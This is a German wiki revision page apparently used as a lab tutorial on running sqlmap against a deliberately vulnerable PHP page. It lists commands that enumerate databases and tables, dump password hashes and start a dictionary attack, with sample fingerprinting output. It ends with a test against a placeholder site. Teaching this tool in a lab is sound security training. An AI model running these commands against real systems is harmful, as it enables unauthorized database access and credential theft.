Sqlmap Anwenden: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 19: | Zeile 19: | ||
=Auslesen der Tabellen der Datenbank= | =Auslesen der Tabellen der Datenbank= | ||
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables | ||
| − | =Auslesen der Passwort- | + | =Auslesen der Passwort-Hashes aus der Datenbank= |
*sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords | *sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords | ||
| + | *Interaktiv kann man hier einen Dictionary-based Angriff starten | ||
=Aufruf des Wizards= | =Aufruf des Wizards= | ||
Version vom 12. August 2021, 14:59 Uhr
Augabe aller Parameter und Optionen
- sqlmap -hh
Angriff und Auflisten der Datenbanken
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -dbs
- Infos
[16:48:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: PHP 5.5.9, Apache 2.4.7 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [16:48:08] [INFO] fetching database names available databases [4]: [*] information_schema [*] mysql [*] performance_schema [*] sql_injections
Auslesen der Tabellen der Datenbank
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" -D sql_injections --tables
Auslesen der Passwort-Hashes aus der Datenbank
- sqlmap "opfer.secure.local/unsafe.php?search=test&submit=Suche" --passwords
- Interaktiv kann man hier einen Dictionary-based Angriff starten
Aufruf des Wizards
- geführt und interaktiv
- sqlmap --wizard
URL angreifen / auf Schwachstellen testen
- URL je nach Struktur der interessanten Seite
- sqlmap www.opfer.de/index.php?id=1
Ausgabe der Datenbanken - falls angreifbar
- sqlmap www.opfer.de/index.php?id=1 --dbs